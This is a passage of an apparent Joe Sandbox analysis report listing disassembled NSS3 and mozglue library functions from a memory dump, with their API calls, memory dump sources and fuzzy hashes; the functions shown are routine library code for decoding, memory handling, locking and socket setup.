                                                                                • free.MOZGLUE(?), ref: 6CFAEEF6
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorValuecallocfreememcpy
                                                                                • String ID:
                                                                                • API String ID: 3833505462-0
                                                                                • Opcode ID: 3e82d346d7a8d3115018e6399f858aa489478804a3798385b295edbd893f1a12
                                                                                • Instruction ID: d671ac4e7454766685f24ca09acf1f20c61bb1989eb8b548b44b4b71ce2e5d79
                                                                                • Opcode Fuzzy Hash: 3e82d346d7a8d3115018e6399f858aa489478804a3798385b295edbd893f1a12
                                                                                • Instruction Fuzzy Hash: AF312871500201DBE7209FA8DC817A7BBF4FB46314F160628E95A87A50EB71E835CBE1
                                                                                Function 6CFB1DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CFB1E0B
                                                                                • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6CFB1E24
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CFB1E3B
                                                                                • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CFB1E8A
                                                                                • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6CFB1EAD
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Choice_DecodeTimeUtil
                                                                                • String ID:
                                                                                • API String ID: 1529734605-0
                                                                                • Opcode ID: 46c60e3a23b5bb24a9fc924ea566222246c14c66785dce79de693e19b770a04f
                                                                                • Instruction ID: e38a9aa27e46c081032f56663a74104ed9a829bb8d67f50dba0266cd71785e4f
                                                                                • Opcode Fuzzy Hash: 46c60e3a23b5bb24a9fc924ea566222246c14c66785dce79de693e19b770a04f
                                                                                • Instruction Fuzzy Hash: 6421D372E08315A7E7018E6ADC40B9B7395DB84368F158638FD5967284E730E914C7E2
                                                                                Function 6CFBAD90 Relevance: 7.6, APIs: 5, Instructions: 72memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PORT_ArenaMark_Util.NSS3(00000000,?,6CFB3FFF,00000000,?,?,?,?,?,6CFB1A1C,00000000,00000000), ref: 6CFBADA7
                                                                                  • Part of subcall function 6D0114C0: TlsGetValue.KERNEL32 ref: 6D0114E0
                                                                                  • Part of subcall function 6D0114C0: EnterCriticalSection.KERNEL32 ref: 6D0114F5
                                                                                  • Part of subcall function 6D0114C0: PR_Unlock.NSS3 ref: 6D01150D
                                                                                • PORT_ArenaAlloc_Util.NSS3(00000000,00000020,?,?,6CFB3FFF,00000000,?,?,?,?,?,6CFB1A1C,00000000,00000000), ref: 6CFBADB4
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D0110F3
                                                                                  • Part of subcall function 6D0110C0: EnterCriticalSection.KERNEL32(?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01110C
                                                                                  • Part of subcall function 6D0110C0: PL_ArenaAllocate.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011141
                                                                                  • Part of subcall function 6D0110C0: PR_Unlock.NSS3(?,?,?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D011182
                                                                                  • Part of subcall function 6D0110C0: TlsGetValue.KERNEL32(?,6CFB8802,00000000,00000008,?,6CFAEF74,00000000), ref: 6D01119C
                                                                                • SECITEM_CopyItem_Util.NSS3(00000000,?,6CFB3FFF,?,?,?,?,6CFB3FFF,00000000,?,?,?,?,?,6CFB1A1C,00000000), ref: 6CFBADD5
                                                                                  • Part of subcall function 6D00FB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6D008D2D,?,00000000,?), ref: 6D00FB85
                                                                                  • Part of subcall function 6D00FB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6D00FBB1
                                                                                • SEC_QuickDERDecodeItem_Util.NSS3(00000000,00000000,6D0D94B0,?,?,?,?,?,?,?,?,6CFB3FFF,00000000,?), ref: 6CFBADEC
                                                                                  • Part of subcall function 6D00B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6D0E18D0,?), ref: 6D00B095
                                                                                • PR_SetError.NSS3(FFFFE022,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6CFB3FFF), ref: 6CFBAE3C
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Util$Arena$Value$Alloc_CriticalEnterErrorItem_SectionUnlock$AllocateCopyDecodeMark_Quickmemcpy
                                                                                • String ID:
                                                                                • API String ID: 2372449006-0
                                                                                • Opcode ID: 446f085987641693450f5b77a2e6d452a29eafb6537ac34e0a41aea3e5e5f4e7
                                                                                • Instruction ID: d798a0b76aeb39a0febce2569e57911f2908963a93afece964a475deee93fb76
                                                                                • Opcode Fuzzy Hash: 446f085987641693450f5b77a2e6d452a29eafb6537ac34e0a41aea3e5e5f4e7
                                                                                • Instruction Fuzzy Hash: A3112662E042056BF7109A66AC41BBF73F89F9564CF048229FD19A7241FB70E954C2E2
                                                                                Function 6CFDCD80 Relevance: 7.6, APIs: 5, Instructions: 60COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6CFF1E10: TlsGetValue.KERNEL32 ref: 6CFF1E36
                                                                                  • Part of subcall function 6CFF1E10: EnterCriticalSection.KERNEL32(?,?,?,6CFCB1EE,2404110F,?,?), ref: 6CFF1E4B
                                                                                  • Part of subcall function 6CFF1E10: PR_Unlock.NSS3 ref: 6CFF1E76
                                                                                • free.MOZGLUE(?,6CFDD079,00000000,00000001), ref: 6CFDCDA5
                                                                                • PK11_FreeSymKey.NSS3(?,6CFDD079,00000000,00000001), ref: 6CFDCDB6
                                                                                • SECITEM_ZfreeItem_Util.NSS3(?,00000001,6CFDD079,00000000,00000001), ref: 6CFDCDCF
                                                                                • DeleteCriticalSection.KERNEL32(?,6CFDD079,00000000,00000001), ref: 6CFDCDE2
                                                                                • free.MOZGLUE(?), ref: 6CFDCDE9
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSectionfree$DeleteEnterFreeItem_K11_UnlockUtilValueZfree
                                                                                • String ID:
                                                                                • API String ID: 1720798025-0
                                                                                • Opcode ID: e7849f54f9641e07cf0e2dfdf79c94cd2da99d282d17a8f52533e70a58408ed8
                                                                                • Instruction ID: 5cfb6a908cf888443614fed2bfbb589e496ae6e1359e68e3c17e2a4f2acd4786
                                                                                • Opcode Fuzzy Hash: e7849f54f9641e07cf0e2dfdf79c94cd2da99d282d17a8f52533e70a58408ed8
                                                                                • Instruction Fuzzy Hash: 1D11CEB6A01216ABEB00AF65EC44F96B77DFF042687194121E929C7E01E732F435CBE1
                                                                                Function 6D013D90 Relevance: 7.6, APIs: 5, Instructions: 57memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6D0138A2), ref: 6D013DB0
                                                                                • PORT_Alloc_Util.NSS3(00000000,?,000000FF,00000000,00000000,00000000,-00000001,?,00000000,?,6D0138A2), ref: 6D013DBF
                                                                                  • Part of subcall function 6D010BE0: malloc.MOZGLUE(6D008D2D,?,00000000,?), ref: 6D010BF8
                                                                                  • Part of subcall function 6D010BE0: TlsGetValue.KERNEL32(6D008D2D,?,00000000,?), ref: 6D010C15
                                                                                • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,6D0138A2), ref: 6D013DD9
                                                                                • _wstat64i32.API-MS-WIN-CRT-FILESYSTEM-L1-1-0(00000000,000000FF,?,000000FF,00000000,00000000,6D0138A2), ref: 6D013DE7
                                                                                • free.MOZGLUE(00000000,?,000000FF,00000000,00000000,6D0138A2), ref: 6D013DF8
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: ByteCharMultiWide$Alloc_UtilValue_wstat64i32freemalloc
                                                                                • String ID:
                                                                                • API String ID: 1642359729-0
                                                                                • Opcode ID: 13c02dfb23bd5d56339bfe007ed141a21a2541f00590d4acd56035f4ab2a9ab1
                                                                                • Instruction ID: 9201d018714c5c0624ae03a7b002c6525f74c92bd6a07457bdd78b9eb59f5d56
                                                                                • Opcode Fuzzy Hash: 13c02dfb23bd5d56339bfe007ed141a21a2541f00590d4acd56035f4ab2a9ab1
                                                                                • Instruction Fuzzy Hash: F301D6B5B082227BFB1456B67C49F7B3DADEB456A4B040239FD29DA1C0EE91CC1185F1
                                                                                Function 6D042D70 Relevance: 7.6, APIs: 5, Instructions: 55COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6D045B40: PR_GetIdentitiesLayer.NSS3 ref: 6D045B56
                                                                                • PR_SetError.NSS3(FFFFE005,00000000), ref: 6D042D9C
                                                                                  • Part of subcall function 6D05C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6D05C2BF
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6D042DB2
                                                                                • PR_EnterMonitor.NSS3(?), ref: 6D042DCF
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6D042DF2
                                                                                • PR_ExitMonitor.NSS3(?), ref: 6D042E0B
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: Monitor$EnterExit$ErrorIdentitiesLayerValue
                                                                                • String ID:
                                                                                • API String ID: 1593528140-0
                                                                                • Opcode ID: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                • Instruction ID: 5f9763f45f5bc413fe43f5b9269a4a6a22aa6719bac77c3cb1b7ea03046b19f4
                                                                                • Opcode Fuzzy Hash: 1e9434b66f5bacf9a806f1db442a6747708187bc64aeee5eb685236fa59530ec
                                                                                • Instruction Fuzzy Hash: A601A1B5B146009FFB309E36FC01F97B7B5EB45318F018435E99ACB221D632F8218696
                                                                                Function 6D0CBDB0 Relevance: 7.6, APIs: 5, Instructions: 51COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteCriticalSection.KERNEL32(?,00000000,00000000,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBDC3
                                                                                • free.MOZGLUE(?,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBDCA
                                                                                • PR_DestroyMonitor.NSS3(?,00000000,00000000,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBDE9
                                                                                • free.MOZGLUE(?,00000000,00000000,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBE21
                                                                                • free.MOZGLUE(00000000,00000000,?,6D0C7AFE,?,?,?,?,?,?,?,?,6D0C798A), ref: 6D0CBE32
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalDeleteDestroyMonitorSection
                                                                                • String ID:
                                                                                • API String ID: 3662805584-0
                                                                                • Opcode ID: 69f59d97028a3685a410144c965591242624659ce32ac41b6f9c5123e5165828
                                                                                • Instruction ID: db1c70bd1a17407fd4349801d75c629e8ca760adcf6f41504a97f3b665cd8614
                                                                                • Opcode Fuzzy Hash: 69f59d97028a3685a410144c965591242624659ce32ac41b6f9c5123e5165828
                                                                                • Instruction Fuzzy Hash: B711F8B5A00202DFEF20DFA8EE07B463BB5EB4B254B450229D52E87310F7B19514CBA2
                                                                                Function 6D0C7C60 Relevance: 7.5, APIs: 5, Instructions: 40stringthreadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • PR_Free.NSS3(?), ref: 6D0C7C73
                                                                                • strlen.API-MS-WIN-CRT-STRING-L1-1-0(?), ref: 6D0C7C83
                                                                                • malloc.MOZGLUE(00000001), ref: 6D0C7C8D
                                                                                • strcpy.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?), ref: 6D0C7C9F
                                                                                • PR_GetCurrentThread.NSS3 ref: 6D0C7CAD
                                                                                  • Part of subcall function 6D079BF0: TlsGetValue.KERNEL32(?,?,?,6D0C0A75), ref: 6D079C07
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentFreeThreadValuemallocstrcpystrlen
                                                                                • String ID:
                                                                                • API String ID: 105370314-0
                                                                                • Opcode ID: f992bfe15db10240b4f89668aa249a0dd0788fb54d44f5ec885d799e241ed77e
                                                                                • Instruction ID: 1dc43544c1866c6a9b13944cd005b20b71a4e90758776cd22edc0c902dd9898e
                                                                                • Opcode Fuzzy Hash: f992bfe15db10240b4f89668aa249a0dd0788fb54d44f5ec885d799e241ed77e
                                                                                • Instruction Fuzzy Hash: EAF0C2B1D14207BBFB009F3AAC09A1B7BA8EF44264B018539E909C7301EB30E510CAA6
                                                                                Function 6D0CADF0 Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DeleteCriticalSection.KERNEL32(6D0CA6D8), ref: 6D0CAE0D
                                                                                • free.MOZGLUE(?), ref: 6D0CAE14
                                                                                • DeleteCriticalSection.KERNEL32(6D0CA6D8), ref: 6D0CAE36
                                                                                • free.MOZGLUE(?), ref: 6D0CAE3D
                                                                                • free.MOZGLUE(00000000,00000000,?,?,6D0CA6D8), ref: 6D0CAE47
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: free$CriticalDeleteSection
                                                                                • String ID:
                                                                                • API String ID: 682657753-0
                                                                                • Opcode ID: 81160caa458600bef84de5343536ac005552ed47e3e1d70e449a67f52b918de6
                                                                                • Instruction ID: e86bd9b102ded09f024565af3cb2ee308abdc321a13e3940fbd1f823bdfc2429
                                                                                • Opcode Fuzzy Hash: 81160caa458600bef84de5343536ac005552ed47e3e1d70e449a67f52b918de6
                                                                                • Instruction Fuzzy Hash: D6F096B5000A06ABDB109F68E808F5B77BDFF86775714032CE52A83580EB71E125CBE6
                                                                                Function 6CF57C40 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 100COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,00010A0D,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6CF57D35
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 632333372-598938438
                                                                                • Opcode ID: 6ba82002aaa8d8213bd309610336e8a92568495bd03ba55834b849138ef618cb
                                                                                • Instruction ID: 6c5fbce0abb7f8a157f58c2b30cd2161545f50f703febc0e2f3c6a7edff6838e
                                                                                • Opcode Fuzzy Hash: 6ba82002aaa8d8213bd309610336e8a92568495bd03ba55834b849138ef618cb
                                                                                • Instruction Fuzzy Hash: E2315C71E142255BC710CF9EC884ABEF7F1EF98305B994197E948B7782D270D861C7A0
                                                                                Function 6CF46C90 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 76COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • sqlite3_log.NSS3(0000000B,%s at line %d of [%.10s],database corruption,000134E5,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4,?), ref: 6CF46D36
                                                                                Strings
                                                                                • 9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6CF46D20
                                                                                • database corruption, xrefs: 6CF46D2A
                                                                                • %s at line %d of [%.10s], xrefs: 6CF46D2F
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: sqlite3_log
                                                                                • String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$database corruption
                                                                                • API String ID: 632333372-598938438
                                                                                • Opcode ID: 1ad034a5dc2a3243f57bf737003acd6b4659dfa2108bb97b16810f50b89071e8
                                                                                • Instruction ID: cfaf327d1a7230706b4ec150e7e5ea664f592fe6fc2b1c2c078b461bedd39d1d
                                                                                • Opcode Fuzzy Hash: 1ad034a5dc2a3243f57bf737003acd6b4659dfa2108bb97b16810f50b89071e8
                                                                                • Instruction Fuzzy Hash: 0F21F4316003059BD710CF1AC841B9BBBF5AF84318F24852DE8499BB92E771F9498792
                                                                                Function 6D07CC70 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 6D07CD70: PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6D07CC7B), ref: 6D07CD7A
                                                                                  • Part of subcall function 6D07CD70: PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6D07CD8E
                                                                                  • Part of subcall function 6D07CD70: PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6D07CDA5
                                                                                  • Part of subcall function 6D07CD70: PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6D07CDB8
                                                                                • PR_GetUniqueIdentity.NSS3(Ipv6_to_Ipv4 layer), ref: 6D07CCB5
                                                                                • memcpy.VCRUNTIME140(6D1114F4,6D1102AC,00000090), ref: 6D07CCD3
                                                                                • memcpy.VCRUNTIME140(6D111588,6D1102AC,00000090), ref: 6D07CD2B
                                                                                  • Part of subcall function 6CF99AC0: socket.WSOCK32(?,00000017,6CF999BE), ref: 6CF99AE6
                                                                                  • Part of subcall function 6CF99AC0: ioctlsocket.WSOCK32(00000000,8004667E,00000001,?,00000017,6CF999BE), ref: 6CF99AFC
                                                                                  • Part of subcall function 6CFA0590: closesocket.WSOCK32(6CF99A8F,?,?,6CF99A8F,00000000), ref: 6CFA0597
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000009.00000002.2844790460.000000006CF31000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6CF30000, based on PE: true
                                                                                • Associated: 00000009.00000002.2844759312.000000006CF30000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846176571.000000006D0CF000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846397061.000000006D10E000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846454103.000000006D10F000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846516166.000000006D110000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                • Associated: 00000009.00000002.2846542493.000000006D115000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_9_2_6cf30000_kat796E.jbxd
                                                                                Similarity
                                                                                • API ID: FindSymbol$memcpy$IdentityLibraryLoadUniqueclosesocketioctlsocketsocket
                                                                                • String ID: Ipv6_to_Ipv4 layer
                                                                                • API String ID: 1231378898-412307543
                                                                                • Opcode ID: d02ffc632d8ad261353f72ab84cfaba4ac1b27f906d05ee57643c668524defc1
